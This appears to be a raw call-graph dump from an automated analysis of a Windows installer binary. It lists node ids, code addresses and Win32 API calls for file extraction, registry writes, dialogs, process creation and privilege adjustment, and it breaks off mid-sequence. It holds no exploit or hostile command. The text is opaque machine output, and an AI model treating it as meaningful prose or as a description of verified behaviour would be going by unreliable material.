3966->3967 3969 401703 3968->3969 3969->3971 3972 406557 lstrcpynW 3969->3972 3971->3966 3971->3967 3972->3971 3973 401e53 GetDC 3974 402d89 21 API calls 3973->3974 3975 401e65 GetDeviceCaps MulDiv ReleaseDC 3974->3975 3976 402d89 21 API calls 3975->3976 3977 401e96 3976->3977 3978 406594 21 API calls 3977->3978 3979 401ed3 CreateFontIndirectW 3978->3979 3980 40263d 3979->3980 3981 402955 3982 402dab 21 API calls 3981->3982 3983 402961 3982->3983 3984 402977 3983->3984 3985 402dab 21 API calls 3983->3985 3986 406022 2 API calls 3984->3986 3985->3984 3987 40297d 3986->3987 4009 406047 GetFileAttributesW CreateFileW 3987->4009 3989 40298a 3990 402a40 3989->3990 3993 4029a5 GlobalAlloc 3989->3993 3994 402a28 3989->3994 3991 402a47 DeleteFileW 3990->3991 3992 402a5a 3990->3992 3991->3992 3993->3994 3995 4029be 3993->3995 3996 4032b9 35 API calls 3994->3996 4010 4034ea SetFilePointer 3995->4010 3998 402a35 CloseHandle 3996->3998 3998->3990 3999 4029c4 4000 4034d4 ReadFile 3999->4000 4001 4029cd GlobalAlloc 4000->4001 4002 402a11 4001->4002 4003 4029dd 4001->4003 4005 4060f9 WriteFile 4002->4005 4004 4032b9 35 API calls 4003->4004 4007 4029ea 4004->4007 4006 402a1d GlobalFree 4005->4006 4006->3994 4008 402a08 GlobalFree 4007->4008 4008->4002 4009->3989 4010->3999 3555 403fd7 3556 404150 3555->3556 3557 403fef 3555->3557 3558 404161 GetDlgItem GetDlgItem 3556->3558 3561 4041a1 3556->3561 3557->3556 3559 403ffb 3557->3559 3560 4044d6 22 API calls 3558->3560 3562 404006 SetWindowPos 3559->3562 3563 404019 3559->3563 3564 40418b SetClassLongW 3560->3564 3565 4041fb 3561->3565 3574 401389 2 API calls 3561->3574 3562->3563 3567 404022 ShowWindow 3563->3567 3568 404064 3563->3568 3571 40140b 2 API calls 3564->3571 3566 404522 SendMessageW 3565->3566 3575 40414b 3565->3575 3597 40420d 3566->3597 3569 404042 GetWindowLongW 3567->3569 3570 40413d 3567->3570 3572 404083 3568->3572 3573 40406c DestroyWindow 3568->3573 3569->3570 3576 40405b ShowWindow 3569->3576 3637 40453d 
3570->3637 3571->3561 3578 404088 SetWindowLongW 3572->3578 3579 404099 3572->3579 3577 40445f 3573->3577 3580 4041d3 3574->3580 3576->3568 3577->3575 3586 404490 ShowWindow 3577->3586 3578->3575 3579->3570 3584 4040a5 GetDlgItem 3579->3584 3580->3565 3585 4041d7 SendMessageW 3580->3585 3582 40140b 2 API calls 3582->3597 3583 404461 DestroyWindow EndDialog 3583->3577 3587 4040d3 3584->3587 3588 4040b6 SendMessageW IsWindowEnabled 3584->3588 3585->3575 3586->3575 3590 4040e0 3587->3590 3592 404127 SendMessageW 3587->3592 3593 4040f3 3587->3593 3601 4040d8 3587->3601 3588->3575 3588->3587 3589 406594 21 API calls 3589->3597 3590->3592 3590->3601 3592->3570 3594 404110 3593->3594 3595 4040fb 3593->3595 3599 40140b 2 API calls 3594->3599 3598 40140b 2 API calls 3595->3598 3596 40410e 3596->3570 3597->3575 3597->3582 3597->3583 3597->3589 3600 4044d6 22 API calls 3597->3600 3619 4043a1 DestroyWindow 3597->3619 3628 4044d6 3597->3628 3598->3601 3602 404117 3599->3602 3600->3597 3634 4044af 3601->3634 3602->3570 3602->3601 3604 404288 GetDlgItem 3605 4042a5 ShowWindow KiUserCallbackDispatcher 3604->3605 3606 40429d 3604->3606 3631 4044f8 KiUserCallbackDispatcher 3605->3631 3606->3605 3608 4042cf EnableWindow 3613 4042e3 3608->3613 3609 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3610 404318 SendMessageW 3609->3610 3609->3613 3610->3613 3612 403fb8 22 API calls 3612->3613 3613->3609 3613->3612 3632 40450b SendMessageW 3613->3632 3633 406557 lstrcpynW 3613->3633 3615 404347 lstrlenW 3616 406594 21 API calls 3615->3616 3617 40435d SetWindowTextW 3616->3617 3618 401389 2 API calls 3617->3618 3618->3597 3619->3577 3620 4043bb CreateDialogParamW 3619->3620 3620->3577 3621 4043ee 3620->3621 3622 4044d6 22 API calls 3621->3622 3623 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3622->3623 3624 401389 2 API calls 3623->3624 3625 40443f 3624->3625 3625->3575 3626 404447 ShowWindow 3625->3626 3627 404522 SendMessageW 3626->3627 3627->3577 3629 406594 21 API calls 
3628->3629 3630 4044e1 SetDlgItemTextW 3629->3630 3630->3604 3631->3608 3632->3613 3633->3615 3635 4044b6 3634->3635 3636 4044bc SendMessageW 3634->3636 3635->3636 3636->3596 3638 404555 GetWindowLongW 3637->3638 3648 404600 3637->3648 3639 40456a 3638->3639 3638->3648 3640 404597 GetSysColor 3639->3640 3641 40459a 3639->3641 3639->3648 3640->3641 3642 4045a0 SetTextColor 3641->3642 3643 4045aa SetBkMode 3641->3643 3642->3643 3644 4045c2 GetSysColor 3643->3644 3645 4045c8 3643->3645 3644->3645 3646 4045d9 3645->3646 3647 4045cf SetBkColor 3645->3647 3646->3648 3649 4045f3 CreateBrushIndirect 3646->3649 3650 4045ec DeleteObject 3646->3650 3647->3646 3648->3575 3649->3648 3650->3649 4011 4014d7 4012 402d89 21 API calls 4011->4012 4013 4014dd Sleep 4012->4013 4015 402c2f 4013->4015 4016 40195b 4017 402dab 21 API calls 4016->4017 4018 401962 lstrlenW 4017->4018 4019 40263d 4018->4019 3712 4020dd 3713 4021a1 3712->3713 3714 4020ef 3712->3714 3716 401423 28 API calls 3713->3716 3715 402dab 21 API calls 3714->3715 3717 4020f6 3715->3717 3723 4022fb 3716->3723 3718 402dab 21 API calls 3717->3718 3719 4020ff 3718->3719 3720 402115 LoadLibraryExW 3719->3720 3721 402107 GetModuleHandleW 3719->3721 3720->3713 3722 402126 3720->3722 3721->3720 3721->3722 3732 4069ba 3722->3732 3726 402170 3728 4055dc 28 API calls 3726->3728 3727 402137 3729 402147 3727->3729 3730 401423 28 API calls 3727->3730 3728->3729 3729->3723 3731 402193 FreeLibrary 3729->3731 3730->3729 3731->3723 3737 406579 WideCharToMultiByte 3732->3737 3734 4069d7 3735 402131 3734->3735 3736 4069de GetProcAddress 3734->3736 3735->3726 3735->3727 3736->3735 3737->3734 4020 402b5e 4021 402bb0 4020->4021 4022 402b65 4020->4022 4023 40694b 5 API calls 4021->4023 4025 402d89 21 API calls 4022->4025 4028 402bae 4022->4028 4024 402bb7 4023->4024 4026 402dab 21 API calls 4024->4026 4027 402b73 4025->4027 4029 402bc0 4026->4029 4030 402d89 21 API calls 4027->4030 4029->4028 4031 402bc4 IIDFromString 4029->4031 4034 402b7f 
4030->4034 4031->4028 4032 402bd3 4031->4032 4032->4028 4038 406557 lstrcpynW 4032->4038 4037 40649e wsprintfW 4034->4037 4035 402bf0 CoTaskMemFree 4035->4028 4037->4028 4038->4035 2937 401761 2943 402dab 2937->2943 2941 40176f 2942 406076 2 API calls 2941->2942 2942->2941 2944 402db7 2943->2944 2953 406594 2944->2953 2947 401768 2949 406076 2947->2949 2950 406083 GetTickCount GetTempFileNameW 2949->2950 2951 4060bd 2950->2951 2952 4060b9 2950->2952 2951->2941 2952->2950 2952->2951 2968 40659f 2953->2968 2954 4067e6 2955 402dd8 2954->2955 2992 406557 lstrcpynW 2954->2992 2955->2947 2970 406805 2955->2970 2957 4067b7 lstrlenW 2957->2968 2959 4066b0 GetSystemDirectoryW 2959->2968 2960 406594 15 API calls 2960->2957 2963 4066c6 GetWindowsDirectoryW 2963->2968 2964 406594 15 API calls 2964->2968 2965 406758 lstrcatW 2965->2968 2966 406805 5 API calls 2966->2968 2968->2954 2968->2957 2968->2959 2968->2960 2968->2963 2968->2964 2968->2965 2968->2966 2969 406728 SHGetPathFromIDListW CoTaskMemFree 2968->2969 2979 406425 2968->2979 2984 40694b GetModuleHandleA 2968->2984 2990 40649e wsprintfW 2968->2990 2991 406557 lstrcpynW 2968->2991 2969->2968 2976 406812 2970->2976 2971 40688d CharPrevW 2972 406888 2971->2972 2972->2971 2974 4068ae 2972->2974 2973 40687b CharNextW 2973->2972 2973->2976 2974->2947 2976->2972 2976->2973 2977 406867 CharNextW 2976->2977 2978 406876 CharNextW 2976->2978 3000 405e53 2976->3000 2977->2976 2978->2973 2993 4063c4 2979->2993 2982 406489 2982->2968 2983 406459 RegQueryValueExW RegCloseKey 2983->2982 2985 406971 GetProcAddress 2984->2985 2986 406967 2984->2986 2987 406980 2985->2987 2997 4068db GetSystemDirectoryW 2986->2997 2987->2968 2989 40696d 2989->2985 2989->2987 2990->2968 2991->2968 2992->2955 2994 4063d3 2993->2994 2995 4063d7 2994->2995 2996 4063dc RegOpenKeyExW 2994->2996 2995->2982 2995->2983 2996->2995 2998 4068fd wsprintfW LoadLibraryExW 2997->2998 2998->2989 3001 405e59 3000->3001 3002 405e6f 3001->3002 3003 405e60 CharNextW 
3001->3003 3002->2976 3003->3001 4039 401d62 4040 402d89 21 API calls 4039->4040 4041 401d73 SetWindowLongW 4040->4041 4042 402c2f 4041->4042 3004 401ee3 3012 402d89 3004->3012 3006 401ee9 3007 402d89 21 API calls 3006->3007 3008 401ef5 3007->3008 3009 401f01 ShowWindow 3008->3009 3010 401f0c EnableWindow 3008->3010 3011 402c2f 3009->3011 3010->3011 3013 406594 21 API calls 3012->3013 3014 402d9e 3013->3014 3014->3006 4043 4028e3 4044 4028eb 4043->4044 4045 4028ef FindNextFileW 4044->4045 4047 402901 4044->4047 4046 402948 4045->4046 4045->4047 4049 406557 lstrcpynW 4046->4049 4049->4047 4050 403be7 4051 403bf2 4050->4051 4052 403bf6 4051->4052 4053 403bf9 GlobalAlloc 4051->4053 4053->4052 4054 401568 4055 402ba9 4054->4055 4058 40649e wsprintfW 4055->4058 4057 402bae 4058->4057 4059 40196d 4060 402d89 21 API calls 4059->4060 4061 401974 4060->4061 4062 402d89 21 API calls 4061->4062 4063 401981 4062->4063 4064 402dab 21 API calls 4063->4064 4065 401998 lstrlenW 4064->4065 4067 4019a9 4065->4067 4066 4019ea 4067->4066 4071 406557 lstrcpynW 4067->4071 4069 4019da 4069->4066 4070 4019df lstrlenW 4069->4070 4070->4066 4071->4069 4072 40166f 4073 402dab 21 API calls 4072->4073 4074 401675 4073->4074 4075 4068b4 2 API calls 4074->4075 4076 40167b 4075->4076 4077 402af0 4078 402d89 21 API calls 4077->4078 4079 402af6 4078->4079 4080 406594 21 API calls 4079->4080 4081 402933 4079->4081 4080->4081 4082 4026f1 4083 402d89 21 API calls 4082->4083 4085 402700 4083->4085 4084 40274a ReadFile 4084->4085 4094 40283d 4084->4094 4085->4084 4086 4060ca ReadFile 4085->4086 4087 406128 5 API calls 4085->4087 4088 40278a MultiByteToWideChar 4085->4088 4089 40283f 4085->4089 4091 4027b0 SetFilePointer MultiByteToWideChar 4085->4091 4092 402850 4085->4092 4085->4094 4086->4085 4087->4085 4088->4085 4095 40649e wsprintfW 4089->4095 4091->4085 4093 402871 SetFilePointer 4092->4093 4092->4094 4093->4094 4095->4094 3514 401774 3515 402dab 21 API calls 3514->3515 3516 40177b 3515->3516 3517 
4017a3 3516->3517 3518 40179b 3516->3518 3554 406557 lstrcpynW 3517->3554 3553 406557 lstrcpynW 3518->3553 3521 4017a1 3525 406805 5 API calls 3521->3525 3522 4017ae 3523 405e26 3 API calls 3522->3523 3524 4017b4 lstrcatW 3523->3524 3524->3521 3535 4017c0 3525->3535 3526 4068b4 2 API calls 3526->3535 3527 406022 2 API calls 3527->3535 3529 4017d2 CompareFileTime 3529->3535 3530 401892 3531 4055dc 28 API calls 3530->3531 3533 40189c 3531->3533 3532 4055dc 28 API calls 3534 40187e 3532->3534 3536 4032b9 35 API calls 3533->3536 3535->3526 3535->3527 3535->3529 3535->3530 3539 406594 21 API calls 3535->3539 3544 406557 lstrcpynW 3535->3544 3549 405bb7 MessageBoxIndirectW 3535->3549 3550 401869 3535->3550 3552 406047 GetFileAttributesW CreateFileW 3535->3552 3537 4018af 3536->3537 3538 4018c3 SetFileTime 3537->3538 3540 4018d5 CloseHandle 3537->3540 3538->3540 3539->3535 3540->3534 3541 4018e6 3540->3541 3542 4018eb 3541->3542 3543 4018fe 3541->3543 3545 406594 21 API calls 3542->3545 3546 406594 21 API calls 3543->3546 3544->3535 3547 4018f3 lstrcatW 3545->3547 3548 401906 3546->3548 3547->3548 3551 405bb7 MessageBoxIndirectW 3548->3551 3549->3535 3550->3532 3550->3534 3551->3534 3552->3535 3553->3521 3554->3522 4096 4014f5 SetForegroundWindow 4097 402c2f 4096->4097 4098 401a77 4099 402d89 21 API calls 4098->4099 4100 401a80 4099->4100 4101 402d89 21 API calls 4100->4101 4102 401a25 4101->4102 3651 401578 3652 401591 3651->3652 3653 401588 ShowWindow 3651->3653 3654 402c2f 3652->3654 3655 40159f ShowWindow 3652->3655 3653->3652 3655->3654 3656 4023f9 3657 402dab 21 API calls 3656->3657 3658 402408 3657->3658 3659 402dab 21 API calls 3658->3659 3660 402411 3659->3660 3661 402dab 21 API calls 3660->3661 3662 40241b GetPrivateProfileStringW 3661->3662 4103 401ffb 4104 402dab 21 API calls 4103->4104 4105 402002 4104->4105 4106 4068b4 2 API calls 4105->4106 4107 402008 4106->4107 4109 402019 4107->4109 4110 40649e wsprintfW 4107->4110 4110->4109 4111 401b7c 4112 402dab 21 
API calls 4111->4112 4113 401b83 4112->4113 4114 402d89 21 API calls 4113->4114 4115 401b8c wsprintfW 4114->4115 4116 402c2f 4115->4116 4117 401000 4118 401037 BeginPaint GetClientRect 4117->4118 4119 40100c DefWindowProcW 4117->4119 4121 4010f3 4118->4121 4124 401179 4119->4124 4122 401073 CreateBrushIndirect FillRect DeleteObject 4121->4122 4123 4010fc 4121->4123 4122->4121 4125 401102 CreateFontIndirectW 4123->4125 4126 401167 EndPaint 4123->4126 4125->4126 4127 401112 6 API calls 4125->4127 4126->4124 4127->4126 4128 404980 4129 404990 4128->4129 4130 4049b6 4128->4130 4132 4044d6 22 API calls 4129->4132 4131 40453d 8 API calls 4130->4131 4133 4049c2 4131->4133 4134 40499d SetDlgItemTextW 4132->4134 4134->4130 4135 401680 4136 402dab 21 API calls 4135->4136 4137 401687 4136->4137 4138 402dab 21 API calls 4137->4138 4139 401690 4138->4139 4140 402dab 21 API calls 4139->4140 4141 401699 MoveFileW 4140->4141 4142 4016a5 4141->4142 4143 4016ac 4141->4143 4144 401423 28 API calls 4142->4144 4145 4068b4 2 API calls 4143->4145 4147 4022fb 4143->4147 4144->4147 4146 4016bb 4145->4146 4146->4147 4148 406317 40 API calls 4146->4148 4148->4142 4149 401503 4150 401508 4149->4150 4152 401520 4149->4152 4151 402d89 21 API calls 4150->4151 4151->4152 4153 401a04 4154 402dab 21 API calls 4153->4154 4155 401a0b 4154->4155 4156 402dab 21 API calls 4155->4156 4157 401a14 4156->4157 4158 401a1b lstrcmpiW 4157->4158 4159 401a2d lstrcmpW 4157->4159 4160 401a21 4158->4160 4159->4160 4161 402304 4162 402dab 21 API calls 4161->4162 4163 40230a 4162->4163 4164 402dab 21 API calls 4163->4164 4165 402313 4164->4165 4166 402dab 21 API calls 4165->4166 4167 40231c 4166->4167 4168 4068b4 2 API calls 4167->4168 4169 402325 4168->4169 4170 402336 lstrlenW lstrlenW 4169->4170 4171 402329 4169->4171 4173 4055dc 28 API calls 4170->4173 4172 4055dc 28 API calls 4171->4172 4175 402331 4171->4175 4172->4175 4174 402374 SHFileOperationW 4173->4174 4174->4171 4174->4175 4176 401d86 4177 401d99 
GetDlgItem 4176->4177 4178 401d8c 4176->4178 4180 401d93 4177->4180 4179 402d89 21 API calls 4178->4179 4179->4180 4181 401dda GetClientRect LoadImageW SendMessageW 4180->4181 4182 402dab 21 API calls 4180->4182 4184 401e38 4181->4184 4186 401e44 4181->4186 4182->4181 4185 401e3d DeleteObject 4184->4185 4184->4186 4185->4186 4187 402388 4188 40238f 4187->4188 4192 4023a2 4187->4192 4189 406594 21 API calls 4188->4189 4190 40239c 4189->4190 4191 405bb7 MessageBoxIndirectW 4190->4191 4191->4192 4193 402c0a SendMessageW 4194 402c24 InvalidateRect 4193->4194 4195 402c2f 4193->4195 4194->4195 4196 40460c lstrcpynW lstrlenW 4197 40248f 4198 402dab 21 API calls 4197->4198 4199 4024a1 4198->4199 4200 402dab 21 API calls 4199->4200 4201 4024ab 4200->4201 4214 402e3b 4201->4214 4204 4024e3 4206 4024ef 4204->4206 4208 402d89 21 API calls 4204->4208 4205 402933 4209 40250e RegSetValueExW 4206->4209 4211 4032b9 35 API calls 4206->4211 4207 402dab 21 API calls 4210 4024d9 lstrlenW 4207->4210 4208->4206 4212 402524 RegCloseKey 4209->4212 4210->4204 4211->4209 4212->4205 4215 402e56 4214->4215 4218 4063f2 4215->4218 4219 406401 4218->4219 4220 4024bb 4219->4220 4221 40640c RegCreateKeyExW 4219->4221 4220->4204 4220->4205 4220->4207 4221->4220 4222 402910 4223 402dab 21 API calls 4222->4223 4224 402917 FindFirstFileW 4223->4224 4225 40293f 4224->4225 4229 40292a 4224->4229 4230 40649e wsprintfW 4225->4230 4227 402948 4231 406557 lstrcpynW 4227->4231 4230->4227 4231->4229 4232 401911 4233 401948 4232->4233 4234 402dab 21 API calls 4233->4234 4235 40194d 4234->4235 4236 405c63 71 API calls 4235->4236 4237 401956 4236->4237 4238 401491 4239 4055dc 28 API calls 4238->4239 4240 401498 4239->4240 4241 401914 4242 402dab 21 API calls 4241->4242 4243 40191b 4242->4243 4244 405bb7 MessageBoxIndirectW 4243->4244 4245 401924 4244->4245 4246 404695 4247 4046ad 4246->4247 4253 4047c7 4246->4253 4254 4044d6 22 API calls 4247->4254 4248 404831 4249 4048fb 4248->4249 4250 40483b GetDlgItem 
4248->4250 4255 40453d 8 API calls 4249->4255 4251 404855 4250->4251 4252 4048bc 4250->4252 4251->4252 4258 40487b SendMessageW LoadCursorW SetCursor 4251->4258 4252->4249 4259 4048ce 4252->4259 4253->4248 4253->4249 4256 404802 GetDlgItem SendMessageW 4253->4256 4257 404714 4254->4257 4269 4048f6 4255->4269 4279 4044f8 KiUserCallbackDispatcher 4256->4279 4261 4044d6 22 API calls 4257->4261 4280 404944 4258->4280 4264 4048e4 4259->4264 4265 4048d4 SendMessageW 4259->4265 4262 404721 CheckDlgButton 4261->4262 4277 4044f8 KiUserCallbackDispatcher 4262->4277 4264->4269 4270 4048ea SendMessageW 4264->4270 4265->4264 4266 40482c 4271 404920 SendMessageW 4266->4271 4270->4269 4271->4248 4272 40473f GetDlgItem 4278 40450b SendMessageW 4272->4278 4274 404755 SendMessageW 4275 404772 GetSysColor 4274->4275 4276 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4274->4276 4275->4276 4276->4269 4277->4272 4278->4274 4279->4266 4283 405b7d ShellExecuteExW 4280->4283 4282 4048aa LoadCursorW SetCursor 4282->4252 4283->4282 4284 402896 4285 40289d 4284->4285 4291 402bae 4284->4291 4286 402d89 21 API calls 4285->4286 4287 4028a4 4286->4287 4288 4028b3 SetFilePointer 4287->4288 4289 4028c3 4288->4289 4288->4291 4292 40649e wsprintfW 4289->4292 4292->4291 4293 401f17 4294 402dab 21 API calls 4293->4294 4295 401f1d 4294->4295 4296 402dab 21 API calls 4295->4296 4297 401f26 4296->4297 4298 402dab 21 API calls 4297->4298 4299 401f2f 4298->4299 4300 402dab 21 API calls 4299->4300 4301 401f38 4300->4301 4302 401423 28 API calls 4301->4302 4303 401f3f 4302->4303 4310 405b7d ShellExecuteExW 4303->4310 4305 401f87 4306 402933 4305->4306 4307 4069f6 5 API calls 4305->4307 4308 401fa4 CloseHandle 4307->4308 4308->4306 4310->4305 4311 402f98 4312 402fc3 4311->4312 4313 402faa SetTimer 4311->4313 4314 403018 4312->4314 4315 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4312->4315 4313->4312 4315->4314 3663 40571b 3664 4058c5 3663->3664 3665 40573c GetDlgItem 
GetDlgItem GetDlgItem 3663->3665 3667 4058f6 3664->3667 3668 4058ce GetDlgItem CreateThread CloseHandle 3664->3668 3708 40450b SendMessageW 3665->3708 3670 405921 3667->3670 3672 405946 3667->3672 3673 40590d ShowWindow ShowWindow 3667->3673 3668->3667 3711 4056af 5 API calls 3668->3711 3669 4057ac 3678 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3669->3678 3671 405981 3670->3671 3675 405935 3670->3675 3676 40595b ShowWindow 3670->3676 3671->3672 3685 40598f SendMessageW 3671->3685 3677 40453d 8 API calls 3672->3677 3710 40450b SendMessageW 3673->3710 3679 4044af SendMessageW 3675->3679 3681 40597b 3676->3681 3682 40596d 3676->3682 3680 405954 3677->3680 3683 405821 3678->3683 3684 405805 SendMessageW SendMessageW 3678->3684 3679->3672 3690 4044af SendMessageW 3681->3690 3689 4055dc 28 API calls 3682->3689 3686 405834 3683->3686 3687 405826 SendMessageW 3683->3687 3684->3683 3685->3680 3688 4059a8 CreatePopupMenu 3685->3688 3692 4044d6 22 API calls 3686->3692 3687->3686 3691 406594 21 API calls 3688->3691 3689->3681 3690->3671 3693 4059b8 AppendMenuW 3691->3693 3694 405844 3692->3694 3695 4059d5 GetWindowRect 3693->3695 3696 4059e8 TrackPopupMenu 3693->3696 3697 405881 GetDlgItem SendMessageW 3694->3697 3698 40584d ShowWindow 3694->3698 3695->3696 3696->3680 3699 405a03 3696->3699 3697->3680 3702 4058a8 SendMessageW SendMessageW 3697->3702 3700 405870 3698->3700 3701 405863 ShowWindow 3698->3701 3703 405a1f SendMessageW 3699->3703 3709 40450b SendMessageW 3700->3709 3701->3700 3702->3680 3703->3703 3704 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3703->3704 3706 405a61 SendMessageW 3704->3706 3706->3706 3707 405a8a GlobalUnlock SetClipboardData CloseClipboard 3706->3707 3707->3680 3708->3669 3709->3697 3710->3670 4316 401d1c 4317 402d89 21 API calls 4316->4317 4318 401d22 IsWindow 4317->4318 4319 401a25 4318->4319 4320 404d1d 4321 404d49 4320->4321 4322 404d2d 4320->4322 4323 404d7c 4321->4323 4324 404d4f SHGetPathFromIDListW 
4321->4324 4331 405b9b GetDlgItemTextW 4322->4331 4326 404d5f 4324->4326 4330 404d66 SendMessageW 4324->4330 4328 40140b 2 API calls 4326->4328 4327 404d3a SendMessageW 4327->4321 4328->4330 4330->4323 4331->4327 4332 40149e 4333 4023a2 4332->4333 4334 4014ac PostQuitMessage 4332->4334 4334->4333 4335 401ba0 4336 401bf1 4335->4336 4341 401bad 4335->4341 4337 401bf6 4336->4337 4338 401c1b GlobalAlloc 4336->4338 4344 4023a2 4337->4344 4356 406557 lstrcpynW 4337->4356 4339 406594 21 API calls 4338->4339 4345 401c36 4339->4345 4340 406594 21 API calls 4346 40239c 4340->4346 4342 401bc4 4341->4342 4341->4345 4354 406557 lstrcpynW 4342->4354 4345->4340 4345->4344 4350 405bb7 MessageBoxIndirectW 4346->4350 4348 401c08 GlobalFree 4348->4344 4349 401bd3 4355 406557 lstrcpynW 4349->4355 4350->4344 4352 401be2 4357 406557 lstrcpynW 4352->4357 4354->4349 4355->4352 4356->4348 4357->4344 4358 402621 4359 402dab 21 API calls 4358->4359 4360 402628 4359->4360 4363 406047 GetFileAttributesW CreateFileW 4360->4363 4362 402634 4363->4362 4364 4025a3 4365 402deb 21 API calls 4364->4365 4366 4025ad 4365->4366 4367 402d89 21 API calls 4366->4367 4368 4025b6 4367->4368 4369 4025d2 RegEnumKeyW 4368->4369 4370 4025de RegEnumValueW 4368->4370 4371 402933 4368->4371 4372 4025f3 RegCloseKey 4369->4372 4370->4372 4372->4371 3190 4015a8 3191 402dab 21 API calls 3190->3191 3192 4015af SetFileAttributesW 3191->3192 3193 4015c1 3192->3193 3194 401fa9 3195 402dab 21 API calls 3194->3195 3196 401faf 3195->3196 3197 4055dc 28 API calls 3196->3197 3198 401fb9 3197->3198 3209 405b3a CreateProcessW 3198->3209 3203 402933 3204 401fd4 3205 401fe4 3204->3205 3206 401fd9 3204->3206 3207 401fe2 CloseHandle 3205->3207 3217 40649e wsprintfW 3206->3217 3207->3203 3210 401fbf 3209->3210 3211 405b6d CloseHandle 3209->3211 3210->3203 3210->3207 3212 4069f6 WaitForSingleObject 3210->3212 3211->3210 3213 406a10 3212->3213 3214 406a22 GetExitCodeProcess 3213->3214 3218 406987 3213->3218 3214->3204 3217->3207 3219 
4069a4 PeekMessageW 3218->3219 3220 4069b4 WaitForSingleObject 3219->3220 3221 40699a DispatchMessageW 3219->3221 3220->3213 3221->3219 3222 40252f 3233 402deb 3222->3233 3225 402dab 21 API calls 3226 402542 3225->3226 3227 40254d RegQueryValueExW 3226->3227 3232 402933 3226->3232 3228 402573 RegCloseKey 3227->3228 3229 40256d 3227->3229 3228->3232 3229->3228 3238 40649e wsprintfW 3229->3238 3234 402dab 21 API calls 3233->3234 3235 402e02 3234->3235 3236 4063c4 RegOpenKeyExW 3235->3236 3237 402539 3236->3237 3237->3225 3238->3228 4374 40202f 4375 402dab 21 API calls 4374->4375 4376 402036 4375->4376 4377 40694b 5 API calls 4376->4377 4378 402045 4377->4378 4379 402061 GlobalAlloc 4378->4379 4382 4020d1 4378->4382 4380 402075 4379->4380 4379->4382 4381 40694b 5 API calls 4380->4381 4383 40207c 4381->4383 4384 40694b 5 API calls 4383->4384 4385 402086 4384->4385 4385->4382 4389 40649e wsprintfW 4385->4389 4387 4020bf 4390 40649e wsprintfW 4387->4390 4389->4387 4390->4382 4391 4021af 4392 402dab 21 API calls 4391->4392 4393 4021b6 4392->4393 4394 402dab 21 API calls 4393->4394 4395 4021c0 4394->4395 4396 402dab 21 API calls 4395->4396 4397 4021ca 4396->4397 4398 402dab 21 API calls 4397->4398 4399 4021d4 4398->4399 4400 402dab 21 API calls 4399->4400 4401 4021de 4400->4401 4402 40221d CoCreateInstance 4401->4402 4403 402dab 21 API calls 4401->4403 4404 40223c 4402->4404 4403->4402 4405 401423 28 API calls 4404->4405 4406 4022fb 4404->4406 4405->4406 3239 403532 SetErrorMode GetVersionExW 3240 403586 GetVersionExW 3239->3240 3241 4035be 3239->3241 3240->3241 3242 403615 3241->3242 3243 40694b 5 API calls 3241->3243 3244 4068db 3 API calls 3242->3244 3243->3242 3245 40362b lstrlenA 3244->3245 3245->3242 3246 40363b 3245->3246 3247 40694b 5 API calls 3246->3247 3248 403642 3247->3248 3249 40694b 5 API calls 3248->3249 3250 403649 3249->3250 3251 40694b 5 API calls 3250->3251 3255 403655 #17 OleInitialize SHGetFileInfoW 3251->3255 3254 4036a4 GetCommandLineW 3328 406557 
lstrcpynW 3254->3328 3327 406557 lstrcpynW 3255->3327 3257 4036b6 3258 405e53 CharNextW 3257->3258 3259 4036dc CharNextW 3258->3259 3267 4036ee 3259->3267 3260 4037f0 3261 403804 GetTempPathW 3260->3261 3329 403501 3261->3329 3263 40381c 3264 403820 GetWindowsDirectoryW lstrcatW 3263->3264 3265 403876 DeleteFileW 3263->3265 3268 403501 12 API calls 3264->3268 3339 403082 GetTickCount GetModuleFileNameW 3265->3339 3266 405e53 CharNextW 3266->3267 3267->3260 3267->3266 3273 4037f2 3267->3273 3270 40383c 3268->3270 3270->3265 3272 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3270->3272 3271 40388a 3274 403941 3271->3274 3277 403931 3271->3277 3281 405e53 CharNextW 3271->3281 3275 403501 12 API calls 3272->3275 3423 406557 lstrcpynW 3273->3423 3428 403b4f 3274->3428 3279 40386e 3275->3279 3367 403c29 3277->3367 3279->3265 3279->3274 3294 4038a9 3281->3294 3283 403ab3 3285 403b37 ExitProcess 3283->3285 3286 403abb GetCurrentProcess OpenProcessToken 3283->3286 3284 403a8f 3435 405bb7 3284->3435 3288 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3286->3288 3289 403b07 3286->3289 3288->3289 3296 40694b 5 API calls 3289->3296 3290 403907 3297 405f2e 18 API calls 3290->3297 3291 40394a 3295 405b22 5 API calls 3291->3295 3294->3290 3294->3291 3298 40394f lstrlenW 3295->3298 3299 403b0e 3296->3299 3300 403913 3297->3300 3426 406557 lstrcpynW 3298->3426 3302 403b23 ExitWindowsEx 3299->3302 3304 403b30 3299->3304 3300->3274 3424 406557 lstrcpynW 3300->3424 3302->3285 3302->3304 3303 403969 3306 403981 3303->3306 3427 406557 lstrcpynW 3303->3427 3439 40140b 3304->3439 3311 4039a7 wsprintfW 3306->3311 3324 4039d3 3306->3324 3308 403926 3425 406557 lstrcpynW 3308->3425 3312 406594 21 API calls 3311->3312 3312->3306 3313 405b05 2 API calls 3313->3324 3314 405aab 2 API calls 3314->3324 3315 4039e3 GetFileAttributesW 3317 4039ef DeleteFileW 3315->3317 3315->3324 3316 403a1d SetCurrentDirectoryW 3318 406317 40 API calls 3316->3318 3317->3324 3319 
